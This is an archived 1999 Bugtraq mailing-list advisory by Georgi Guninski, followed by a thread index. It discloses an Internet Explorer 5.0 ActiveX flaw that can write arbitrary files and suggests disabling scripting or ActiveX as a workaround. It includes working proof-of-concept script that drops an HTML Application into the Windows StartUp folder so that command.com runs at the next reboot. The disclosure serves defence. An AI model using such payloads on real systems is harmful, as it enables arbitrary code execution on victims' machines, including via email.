Bugtraq mailing list archives
IE 5.0 allows executing programs
From: joro () NAT BG (Georgi Guninski)
Date: Sat, 21 Aug 1999 19:17:10 +0300
Disclaimer: The opinions expressed in this advisory and program are my own and not of any company. The usual standard disclaimer applies, especially the fact that Georgi Guninski is not liable for any damages caused by direct or indirect use of the information or functionality provided by this program. Georgi Guninski, bears NO responsibility for content or misuse of this program or any derivatives thereof. Description: Internet Explorer 5.0 under Windows 95/98 (do not know about NT) allows executing arbitrary programs on the local machine by creating and overwriting local files and putting content in them. Details: The problem is the ActiveX Control "Object for constructing type libraries for scriptlets". It allows creating and overwriting local files, and more putting content in them. There is some unneeded information in the file, but part of the content may be chosen. So, an HTML Application file may be created, feeded with an exploit information and written to the StartUp folder. The next time the user reboots (which may be forced), the code in the HTML Application file will be executed. This vulnerability can be exploited via email. Demonstration is available at: http://www.nat.bg/~joro/scrtlb.html Workaround: Disable Active Scripting or Disable Run ActiveX Controls and plug-ins The code is: <object id="scr" classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC"
</object> <SCRIPT> scr.Reset(); scr.Path="C:\\windows\\Start Menu\\Programs\\StartUp\\guninski.hta"; scr.Doc="<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><SCRIPT>alert('Written by Georgi Guninski http://www.nat.bg/~joro');wsh.Run('c:\\command.com');</"+"SCRIPT>"; scr.write(); </SCRIPT> </object> Regards, Georgi Guninski http://www.nat.bg/~joro
Current thread:
- [RHSA-1999:028-01] Buffer overflow in libtermcap tgetent(), (continued)
- [RHSA-1999:028-01] Buffer overflow in libtermcap tgetent() Bill Nottingham (Aug 17)
- Re: [RHSA-1999:028-01] Buffer overflow in libtermcap tgetent() Michal Zalewski (Jul 03)
- Re: [RHSA-1999:028-01] Buffer overflow in libtermcap tgetent() Michal Zalewski (Jul 03)
- Re: [RHSA-1999:028-01] Buffer overflow in libtermcap tgetent() Tymm Twillman (Aug 19)
- Re: [RHSA-1999:028-01] Buffer overflow in libtermcap tgetent() Michal Zalewski (Jul 03)
- [RHSA-1999:029-01] Denial of service attack in in.telnetd Bill Nottingham (Aug 19)
- Re: [RHSA-1999:028-01] Buffer overflow in libtermcap tgetent() Olaf Kirch (Aug 19)
- Insecure use of file in /tmp by trn Martin Schulze (Aug 19)
- Winamp SHOUTcast server: Gain Administrator Password Michael (Aug 20)
- Re: Insecure use of file in /tmp by trn Rogier Wolff (Aug 21)
- IE 5.0 allows executing programs Georgi Guninski (Aug 21)
- Re: IE 5.0 allows executing programs David LeBlanc (Aug 23)
- Re: IE 5.0 allows executing programs Jesper M. Johansson (Aug 28)
- [RHSA-1999:028-01] Buffer overflow in libtermcap tgetent() Bill Nottingham (Aug 17)
- Vulnerability in Solaris 2.6. rpc.statd ? Bob Todd (Aug 21)
- Re: Vulnerability in Solaris 2.6. rpc.statd ? Bob Todd (Aug 24)
- Re: Vulnerability in Solaris 2.6. rpc.statd ? mb (Aug 28)
- Re: [RHSA-1999:028-01] Buffer overflow in libtermcap tgetent() Martin Schulze (Aug 19)
- Re: [RHSA-1999:028-01] Buffer overflow in libtermcap tgetent() Aaron Campbell (Aug 19)
- Microsoft Security Bulletin (MS99-030) Aleph One (Aug 20)
- Re: [RHSA-1999:028-01] Buffer overflow in libtermcap tgetent() Alan Cox (Aug 22)
- libtermcap exploit fix ... smashcap.c Hudin Lucian (Aug 22)